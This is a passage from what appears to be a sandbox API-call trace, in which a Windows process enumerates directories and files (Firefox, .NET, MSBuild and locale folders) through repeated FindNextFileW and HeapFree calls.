ftLastAccessTime.dwLowDateTime=0xedb1a83d, ftLastAccessTime.dwHighDateTime=0x1d327c9, ftLastWriteTime.dwLowDateTime=0xedb1a83d, ftLastWriteTime.dwHighDateTime=0x1d327c9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="features", cAlternateFileName="")) returned 1 [0171.236] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x457bee8 | out: hHeap=0x6a0000) returned 1 [0171.236] FindNextFileW (in: hFindFile=0x728308, lpFindFileData=0x3b3f584 | out: lpFindFileData=0x3b3f584*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xecdc36bc, ftCreationTime.dwHighDateTime=0x1d327c9, ftLastAccessTime.dwLowDateTime=0xecdc36bc, ftLastAccessTime.dwHighDateTime=0x1d327c9, ftLastWriteTime.dwLowDateTime=0xb5133d80, ftLastWriteTime.dwHighDateTime=0x1d31ce2, nFileSizeHigh=0x0, nFileSizeLow=0x20853ba, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="omni.ja", cAlternateFileName="")) returned 1 [0171.237] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x457bee8 | out: hHeap=0x6a0000) returned 1 [0171.237] FindNextFileW (in: hFindFile=0x728308, lpFindFileData=0x3b3f584 | out: lpFindFileData=0x3b3f584*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xece35df2, ftCreationTime.dwHighDateTime=0x1d327c9, ftLastAccessTime.dwLowDateTime=0xed7d339e, ftLastAccessTime.dwHighDateTime=0x1d327c9, ftLastWriteTime.dwLowDateTime=0xed7d339e, ftLastWriteTime.dwHighDateTime=0x1d327c9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="VisualElements", cAlternateFileName="VISUAL~1")) returned 0 [0171.237] FindClose (in: hFindFile=0x728308 | out: hFindFile=0x728308) returned 1 [0171.237] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x455b7a8 | out: hHeap=0x6a0000) returned 1 [0171.237] FindNextFileW (in: hFindFile=0x727d88, lpFindFileData=0x3b3f800 | out: lpFindFileData=0x3b3f800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xec033d59, ftCreationTime.dwHighDateTime=0x1d327c9, ftLastAccessTime.dwLowDateTime=0xec033d59, ftLastAccessTime.dwHighDateTime=0x1d327c9, ftLastWriteTime.dwLowDateTime=0xe2ca280, ftLastWriteTime.dwHighDateTime=0x1d31cde, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="chrome.manifest", cAlternateFileName="CHROME~1.MAN")) returned 1 [0171.237] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x457bee8 | out: hHeap=0x6a0000) returned 1 [0171.237] FindNextFileW (in: hFindFile=0x728048, lpFindFileData=0x3b3f584 | out: lpFindFileData=0x3b3f584*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xecc92398, ftCreationTime.dwHighDateTime=0x1d327c9, ftLastAccessTime.dwLowDateTime=0xeccb8639, ftLastAccessTime.dwHighDateTime=0x1d327c9, ftLastWriteTime.dwLowDateTime=0xeccb8639, ftLastWriteTime.dwHighDateTime=0x1d327c9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="pref", cAlternateFileName="")) returned 0 [0171.238] FindClose (in: hFindFile=0x728048 | out: hFindFile=0x728048) returned 1 [0171.238] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x455b7a8 | out: hHeap=0x6a0000) returned 1 [0171.238] FindNextFileW (in: hFindFile=0x727d88, lpFindFileData=0x3b3f800 | out: lpFindFileData=0x3b3f800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xec0a647c, ftCreationTime.dwHighDateTime=0x1d327c9, ftLastAccessTime.dwLowDateTime=0xec0a647c, ftLastAccessTime.dwHighDateTime=0x1d327c9, ftLastWriteTime.dwLowDateTime=0x4504b780, ftLastWriteTime.dwHighDateTime=0x1d31ce2, nFileSizeHigh=0x0, nFileSizeLow=0x1ee, dwReserved0=0x0, dwReserved1=0x0, cFileName="dependentlibs.list", cAlternateFileName="DEPEND~1.LIS")) returned 1 [0171.238] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x455b7a8 | out: hHeap=0x6a0000) returned 1 [0171.238] FindNextFileW (in: hFindFile=0x727d88, lpFindFileData=0x3b3f800 | out: lpFindFileData=0x3b3f800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xec0cc6d9, ftCreationTime.dwHighDateTime=0x1d327c9, ftLastAccessTime.dwLowDateTime=0xec0cc6d9, ftLastAccessTime.dwHighDateTime=0x1d327c9, ftLastWriteTime.dwLowDateTime=0x767d8300, ftLastWriteTime.dwHighDateTime=0x1d31ce2, nFileSizeHigh=0x0, nFileSizeLow=0x7cdd0, dwReserved0=0x0, dwReserved1=0x0, cFileName="firefox.exe", cAlternateFileName="")) returned 1 [0171.238] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x455b7a8 | out: hHeap=0x6a0000) returned 1 [0171.238] FindNextFileW (in: hFindFile=0x727d88, lpFindFileData=0x3b3f800 | out: lpFindFileData=0x3b3f800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xec118bb8, ftCreationTime.dwHighDateTime=0x1d327c9, ftLastAccessTime.dwLowDateTime=0xec118bb8, ftLastAccessTime.dwHighDateTime=0x1d327c9, ftLastWriteTime.dwLowDateTime=0x77aeb000, ftLastWriteTime.dwHighDateTime=0x1d31ce2, nFileSizeHigh=0x0, nFileSizeLow=0x383, dwReserved0=0x0, dwReserved1=0x0, cFileName="freebl3.chk", cAlternateFileName="")) returned 1 [0171.239] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x457bee8 | out: hHeap=0x6a0000) returned 1 [0171.239] FindNextFileW (in: hFindFile=0x728048, lpFindFileData=0x3b3f584 | out: lpFindFileData=0x3b3f584*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xecaee98b, ftCreationTime.dwHighDateTime=0x1d327c9, ftLastAccessTime.dwLowDateTime=0xecb87321, ftLastAccessTime.dwHighDateTime=0x1d327c9, ftLastWriteTime.dwLowDateTime=0xecb87321, ftLastWriteTime.dwHighDateTime=0x1d327c9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="0.1", cAlternateFileName="")) returned 0 [0171.239] FindClose (in: hFindFile=0x728048 | out: hFindFile=0x728048) returned 1 [0171.239] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x455b7a8 | out: hHeap=0x6a0000) returned 1 [0171.239] FindNextFileW (in: hFindFile=0x727d88, lpFindFileData=0x3b3f800 | out: lpFindFileData=0x3b3f800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xec13ee02, ftCreationTime.dwHighDateTime=0x1d327c9, ftLastAccessTime.dwLowDateTime=0xec13ee02, ftLastAccessTime.dwHighDateTime=0x1d327c9, ftLastWriteTime.dwLowDateTime=0x78dfdd00, ftLastWriteTime.dwHighDateTime=0x1d31ce2, nFileSizeHigh=0x0, nFileSizeLow=0x139d0, dwReserved0=0x0, dwReserved1=0x0, cFileName="IA2Marshal.dll", cAlternateFileName="IA2MAR~1.DLL")) returned 1 [0171.241] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x455b7a8 | out: hHeap=0x6a0000) returned 1 [0171.241] FindNextFileW (in: hFindFile=0x727d88, lpFindFileData=0x3b3f800 | out: lpFindFileData=0x3b3f800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xec629cf8, ftCreationTime.dwHighDateTime=0x1d327c9, ftLastAccessTime.dwLowDateTime=0xec629cf8, ftLastAccessTime.dwHighDateTime=0x1d327c9, ftLastWriteTime.dwLowDateTime=0xdde50400, ftLastWriteTime.dwHighDateTime=0x1d31cdd, nFileSizeHigh=0x0, nFileSizeLow=0x84, dwReserved0=0x0, dwReserved1=0x0, cFileName="update-settings.ini", cAlternateFileName="UPDATE~1.INI")) returned 1 [0171.241] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x459bfd8 | out: hHeap=0x6a0000) returned 1 [0171.243] FindNextFileW (in: hFindFile=0x727d48, lpFindFileData=0x3b3fa7c | out: lpFindFileData=0x3b3fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x709c717f, ftCreationTime.dwHighDateTime=0x1d327be, ftLastAccessTime.dwLowDateTime=0xe623e79b, ftLastAccessTime.dwHighDateTime=0x1d5038d, ftLastWriteTime.dwLowDateTime=0xe623e79b, ftLastWriteTime.dwHighDateTime=0x1d5038d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x7ef, dwReserved1=0xffffbffe, cFileName="MSBuild", cAlternateFileName="")) returned 1 [0171.244] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x45aefd0 | out: hHeap=0x6a0000) returned 1 [0171.244] FindNextFileW (in: hFindFile=0x728108, lpFindFileData=0x3b3f308 | out: lpFindFileData=0x3b3f308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x709c717f, ftCreationTime.dwHighDateTime=0x1d327be, ftLastAccessTime.dwLowDateTime=0x709ed3a7, ftLastAccessTime.dwHighDateTime=0x1d327be, ftLastWriteTime.dwLowDateTime=0x709ed3a7, ftLastWriteTime.dwHighDateTime=0x1d327be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="v3.5", cAlternateFileName="")) returned 1 [0171.245] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x45aefd0 | out: hHeap=0x6a0000) returned 1 [0171.245] FindNextFileW (in: hFindFile=0x728108, lpFindFileData=0x3b3f308 | out: lpFindFileData=0x3b3f308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x709c717f, ftCreationTime.dwHighDateTime=0x1d327be, ftLastAccessTime.dwLowDateTime=0x709ed3a7, ftLastAccessTime.dwHighDateTime=0x1d327be, ftLastWriteTime.dwLowDateTime=0x709ed3a7, ftLastWriteTime.dwHighDateTime=0x1d327be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="v3.5", cAlternateFileName="")) returned 0 [0171.245] FindClose (in: hFindFile=0x728108 | out: hFindFile=0x728108) returned 1 [0171.245] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x457bee8 | out: hHeap=0x6a0000) returned 1 [0171.245] FindNextFileW (in: hFindFile=0x728048, lpFindFileData=0x3b3f584 | out: lpFindFileData=0x3b3f584*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x709c717f, ftCreationTime.dwHighDateTime=0x1d327be, ftLastAccessTime.dwLowDateTime=0x709c717f, ftLastAccessTime.dwHighDateTime=0x1d327be, ftLastWriteTime.dwLowDateTime=0x709c717f, ftLastWriteTime.dwHighDateTime=0x1d327be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="Windows Workflow Foundation", cAlternateFileName="WINDOW~1")) returned 0 [0171.245] FindClose (in: hFindFile=0x728048 | out: hFindFile=0x728048) returned 1 [0171.245] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x455b7a8 | out: hHeap=0x6a0000) returned 1 [0171.247] FindNextFileW (in: hFindFile=0x727d88, lpFindFileData=0x3b3f800 | out: lpFindFileData=0x3b3f800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa3fb55e0, ftCreationTime.dwHighDateTime=0x1d486b4, ftLastAccessTime.dwLowDateTime=0xf041a6f0, ftLastAccessTime.dwHighDateTime=0x1d4e0d4, ftLastWriteTime.dwLowDateTime=0xf041a6f0, ftLastWriteTime.dwHighDateTime=0x1d4e0d4, nFileSizeHigh=0x0, nFileSizeLow=0x12800, dwReserved0=0x0, dwReserved1=0x0, cFileName="rebel.exe", cAlternateFileName="")) returned 1 [0171.247] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x459bfd8 | out: hHeap=0x6a0000) returned 1 [0171.247] FindNextFileW (in: hFindFile=0x727d48, lpFindFileData=0x3b3fa7c | out: lpFindFileData=0x3b3fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x709ed3a7, ftCreationTime.dwHighDateTime=0x1d327be, ftLastAccessTime.dwLowDateTime=0x709ed3a7, ftLastAccessTime.dwHighDateTime=0x1d327be, ftLastWriteTime.dwLowDateTime=0x709ed3a7, ftLastWriteTime.dwHighDateTime=0x1d327be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x7ef, dwReserved1=0xffffbffe, cFileName="Reference Assemblies", cAlternateFileName="REFERE~1")) returned 1 [0171.249] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4662508 | out: hHeap=0x6a0000) returned 1 [0171.249] FindNextFileW (in: hFindFile=0x728288, lpFindFileData=0x3b3f08c | out: lpFindFileData=0x3b3f08c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9093563c, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x6df28692, ftLastAccessTime.dwHighDateTime=0x1d327be, ftLastWriteTime.dwLowDateTime=0x6df4e8ff, ftLastWriteTime.dwHighDateTime=0x1d327be, nFileSizeHigh=0x0, nFileSizeLow=0x63000, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="System.IdentityModel.dll", cAlternateFileName="")) returned 1 [0171.250] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x45aefd0 | out: hHeap=0x6a0000) returned 1 [0171.250] FindNextFileW (in: hFindFile=0x728108, lpFindFileData=0x3b3f308 | out: lpFindFileData=0x3b3f308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x70a5faff, ftCreationTime.dwHighDateTime=0x1d327be, ftLastAccessTime.dwLowDateTime=0x70af849b, ftLastAccessTime.dwHighDateTime=0x1d327be, ftLastWriteTime.dwLowDateTime=0x70af849b, ftLastWriteTime.dwHighDateTime=0x1d327be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="v3.5", cAlternateFileName="")) returned 1 [0171.251] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4662508 | out: hHeap=0x6a0000) returned 1 [0171.251] FindNextFileW (in: hFindFile=0x728288, lpFindFileData=0x3b3f08c | out: lpFindFileData=0x3b3f08c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x51ee72a2, ftCreationTime.dwHighDateTime=0x1d327be, ftLastAccessTime.dwLowDateTime=0x51ee72a2, ftLastAccessTime.dwHighDateTime=0x1d327be, ftLastWriteTime.dwLowDateTime=0x84d80300, ftLastWriteTime.dwHighDateTime=0x1d2837f, nFileSizeHigh=0x0, nFileSizeLow=0xb000, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="System.AddIn.Contract.dll", cAlternateFileName="")) returned 1 [0171.252] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x45aefd0 | out: hHeap=0x6a0000) returned 1 [0171.252] FindNextFileW (in: hFindFile=0x728108, lpFindFileData=0x3b3f308 | out: lpFindFileData=0x3b3f308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x70a5faff, ftCreationTime.dwHighDateTime=0x1d327be, ftLastAccessTime.dwLowDateTime=0x70af849b, ftLastAccessTime.dwHighDateTime=0x1d327be, ftLastWriteTime.dwLowDateTime=0x70af849b, ftLastWriteTime.dwHighDateTime=0x1d327be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="v3.5", cAlternateFileName="")) returned 0 [0171.252] FindClose (in: hFindFile=0x728108 | out: hFindFile=0x728108) returned 1 [0171.252] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x457bee8 | out: hHeap=0x6a0000) returned 1 [0171.253] FindNextFileW (in: hFindFile=0x728048, lpFindFileData=0x3b3f584 | out: lpFindFileData=0x3b3f584*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x709ed3a7, ftCreationTime.dwHighDateTime=0x1d327be, ftLastAccessTime.dwLowDateTime=0x70a5faff, ftLastAccessTime.dwHighDateTime=0x1d327be, ftLastWriteTime.dwLowDateTime=0x70a5faff, ftLastWriteTime.dwHighDateTime=0x1d327be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="Framework", cAlternateFileName="FRAMEW~1")) returned 0 [0171.253] FindClose (in: hFindFile=0x728048 | out: hFindFile=0x728048) returned 1 [0171.253] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x455b7a8 | out: hHeap=0x6a0000) returned 1 [0171.255] FindNextFileW (in: hFindFile=0x727d88, lpFindFileData=0x3b3f800 | out: lpFindFileData=0x3b3f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x709ed3a7, ftCreationTime.dwHighDateTime=0x1d327be, ftLastAccessTime.dwLowDateTime=0x709ed3a7, ftLastAccessTime.dwHighDateTime=0x1d327be, ftLastWriteTime.dwLowDateTime=0x709ed3a7, ftLastWriteTime.dwHighDateTime=0x1d327be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft", cAlternateFileName="MICROS~1")) returned 0 [0171.255] FindClose (in: hFindFile=0x727d88 | out: hFindFile=0x727d88) returned 1 [0171.255] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x459bfd8 | out: hHeap=0x6a0000) returned 1 [0171.255] FindNextFileW (in: hFindFile=0x727d48, lpFindFileData=0x3b3fa7c | out: lpFindFileData=0x3b3fa7c*(dwFileAttributes=0x30, ftCreationTime.dwLowDateTime=0x59f2f4b4, ftCreationTime.dwHighDateTime=0x1d32723, ftLastAccessTime.dwLowDateTime=0xa73e1bbd, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x8390c831, ftLastWriteTime.dwHighDateTime=0x1d32735, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x7ef, dwReserved1=0xffffbffe, cFileName="rempl", cAlternateFileName="")) returned 1 [0171.256] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x455b7a8 | out: hHeap=0x6a0000) returned 1 [0171.256] FindNextFileW (in: hFindFile=0x728048, lpFindFileData=0x3b3f800 | out: lpFindFileData=0x3b3f800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x76938800, ftCreationTime.dwHighDateTime=0x1d2e919, ftLastAccessTime.dwLowDateTime=0x59f55710, ftLastAccessTime.dwHighDateTime=0x1d32723, ftLastWriteTime.dwLowDateTime=0x76938800, ftLastWriteTime.dwHighDateTime=0x1d2e919, nFileSizeHigh=0x0, nFileSizeLow=0xf2c, dwReserved0=0x0, dwReserved1=0x0, cFileName="rempl.xml", cAlternateFileName="")) returned 1 [0171.256] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x459bfd8 | out: hHeap=0x6a0000) returned 1 [0171.256] FindNextFileW (in: hFindFile=0x727d48, lpFindFileData=0x3b3fa7c | out: lpFindFileData=0x3b3fa7c*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0xd2709a20, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xa747e827, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xd2709a20, ftLastWriteTime.dwHighDateTime=0x1d1a04e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x7ef, dwReserved1=0xffffbffe, cFileName="Uninstall Information", cAlternateFileName="UNINST~1")) returned 1 [0171.287] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x459bfd8 | out: hHeap=0x6a0000) returned 1 [0171.287] FindNextFileW (in: hFindFile=0x727d48, lpFindFileData=0x3b3fa7c | out: lpFindFileData=0x3b3fa7c*(dwFileAttributes=0x30, ftCreationTime.dwLowDateTime=0x4c509d45, ftCreationTime.dwHighDateTime=0x1d32723, ftLastAccessTime.dwLowDateTime=0xa747f43e, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x749f4454, ftLastWriteTime.dwHighDateTime=0x1d32723, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x7ef, dwReserved1=0xffffbffe, cFileName="UNP", cAlternateFileName="")) returned 1 [0171.407] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4662508 | out: hHeap=0x6a0000) returned 1 [0171.407] FindNextFileW (in: hFindFile=0x727f48, lpFindFileData=0x3b3ee10 | out: lpFindFileData=0x3b3ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8e32400a, ftCreationTime.dwHighDateTime=0x1d32723, ftLastAccessTime.dwLowDateTime=0xa772ddc0, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x8e32400a, ftLastWriteTime.dwHighDateTime=0x1d32723, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="bg-BG", cAlternateFileName="")) returned 1 [0171.410] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4662508 | out: hHeap=0x6a0000) returned 1 [0171.410] FindNextFileW (in: hFindFile=0x727f48, lpFindFileData=0x3b3ee10 | out: lpFindFileData=0x3b3ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8e34a1b4, ftCreationTime.dwHighDateTime=0x1d32723, ftLastAccessTime.dwLowDateTime=0xa77fb761, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x8e34a1b4, ftLastWriteTime.dwHighDateTime=0x1d32723, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ca-ES", cAlternateFileName="")) returned 1 [0171.413] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4662508 | out: hHeap=0x6a0000) returned 1 [0171.413] FindNextFileW (in: hFindFile=0x727f48, lpFindFileData=0x3b3ee10 | out: lpFindFileData=0x3b3ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8e34a1b4, ftCreationTime.dwHighDateTime=0x1d32723, ftLastAccessTime.dwLowDateTime=0xa78433f2, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x8e34a1b4, ftLastWriteTime.dwHighDateTime=0x1d32723, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ca-ES-valencia", cAlternateFileName="CA-ES-~1")) returned 1 [0171.416] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4662508 | out: hHeap=0x6a0000) returned 1 [0171.416] FindNextFileW (in: hFindFile=0x727f48, lpFindFileData=0x3b3ee10 | out: lpFindFileData=0x3b3ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8e34a1b4, ftCreationTime.dwHighDateTime=0x1d32723, ftLastAccessTime.dwLowDateTime=0xa78fe34b, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x8e3703fd, ftLastWriteTime.dwHighDateTime=0x1d32723, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="cs-CZ", cAlternateFileName="")) returned 1 [0171.420] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4662508 | out: hHeap=0x6a0000) returned 1 [0171.420] FindNextFileW (in: hFindFile=0x727f48, lpFindFileData=0x3b3ee10 | out: lpFindFileData=0x3b3ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8e3703fd, ftCreationTime.dwHighDateTime=0x1d32723, ftLastAccessTime.dwLowDateTime=0xa795f898, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x8e3703fd, ftLastWriteTime.dwHighDateTime=0x1d32723, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="da-DK", cAlternateFileName="")) returned 1 [0171.423] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4662508 | out: hHeap=0x6a0000) returned 1 [0171.424] FindNextFileW (in: hFindFile=0x727f48, lpFindFileData=0x3b3ee10 | out: lpFindFileData=0x3b3ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8e3703fd, ftCreationTime.dwHighDateTime=0x1d32723, ftLastAccessTime.dwLowDateTime=0xa79714a3, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x8e396633, ftLastWriteTime.dwHighDateTime=0x1d32723, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="de-AT", cAlternateFileName="")) returned 1 [0171.428] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4662508 | out: hHeap=0x6a0000) returned 1 [0171.428] FindNextFileW (in: hFindFile=0x727f48, lpFindFileData=0x3b3ee10 | out: lpFindFileData=0x3b3ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8e396633, ftCreationTime.dwHighDateTime=0x1d32723, ftLastAccessTime.dwLowDateTime=0xa79bb5f0, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x8e396633, ftLastWriteTime.dwHighDateTime=0x1d32723, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="de-CH", cAlternateFileName="")) returned 1 [0171.434] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4662508 | out: hHeap=0x6a0000) returned 1 [0171.434] FindNextFileW (in: hFindFile=0x727f48, lpFindFileData=0x3b3ee10 | out: lpFindFileData=0x3b3ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8e396633, ftCreationTime.dwHighDateTime=0x1d32723, ftLastAccessTime.dwLowDateTime=0xa7a12def, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x8e3bc889, ftLastWriteTime.dwHighDateTime=0x1d32723, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="de-DE", cAlternateFileName="")) returned 1 [0171.437] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4662508 | out: hHeap=0x6a0000) returned 1 [0171.437] FindNextFileW (in: hFindFile=0x727f48, lpFindFileData=0x3b3ee10 | out: lpFindFileData=0x3b3ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8e3bc889, ftCreationTime.dwHighDateTime=0x1d32723, ftLastAccessTime.dwLowDateTime=0xa7adca7e, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x8e3bc889, ftLastWriteTime.dwHighDateTime=0x1d32723, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="el-GR", cAlternateFileName="")) returned 1 [0171.443] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4662508 | out: hHeap=0x6a0000) returned 1 [0171.443] FindNextFileW (in: hFindFile=0x727f48, lpFindFileData=0x3b3ee10 | out: lpFindFileData=0x3b3ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8e3bc889, ftCreationTime.dwHighDateTime=0x1d32723, ftLastAccessTime.dwLowDateTime=0xa7b18143, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x8e3e2af7, ftLastWriteTime.dwHighDateTime=0x1d32723, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-AU", cAlternateFileName="")) returned 1 [0171.536] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4662508 | out: hHeap=0x6a0000) returned 1 [0171.536] FindNextFileW (in: hFindFile=0x727f48, lpFindFileData=0x3b3ee10 | out: lpFindFileData=0x3b3ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8e3e2af7, ftCreationTime.dwHighDateTime=0x1d32723, ftLastAccessTime.dwLowDateTime=0xa7b914a6, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x8e3e2af7, ftLastWriteTime.dwHighDateTime=0x1d32723, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-CA", cAlternateFileName="")) returned 1 [0171.538] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4662508 | out: hHeap=0x6a0000) returned 1 [0171.538] FindNextFileW (in: hFindFile=0x727f48, lpFindFileData=0x3b3ee10 | out: lpFindFileData=0x3b3ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8e3e2af7, ftCreationTime.dwHighDateTime=0x1d32723, ftLastAccessTime.dwLowDateTime=0xa7b93b92, 